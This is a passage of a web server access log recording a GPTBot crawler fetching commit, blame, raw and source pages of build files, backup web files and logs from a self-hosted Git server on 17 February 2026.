like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10171] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:16:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11220] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" +[17/Feb/2026:16:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11519] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" +[17/Feb/2026:16:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" +[17/Feb/2026:16:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" +[17/Feb/2026:16:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" +[17/Feb/2026:16:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2?display=source" [Client 74.7.227.38] [Length 14707] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" +[17/Feb/2026:16:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11078] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:38:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11617] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" +[17/Feb/2026:16:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9762] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12801] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" +[17/Feb/2026:16:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" +[17/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" +[17/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11044] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14447] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" +[17/Feb/2026:16:38:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:38:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" +[17/Feb/2026:16:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" +[17/Feb/2026:16:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" +[17/Feb/2026:16:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11538] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" +[17/Feb/2026:16:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" +[17/Feb/2026:16:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11538] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" +[17/Feb/2026:16:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12802] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" +[17/Feb/2026:16:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11539] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 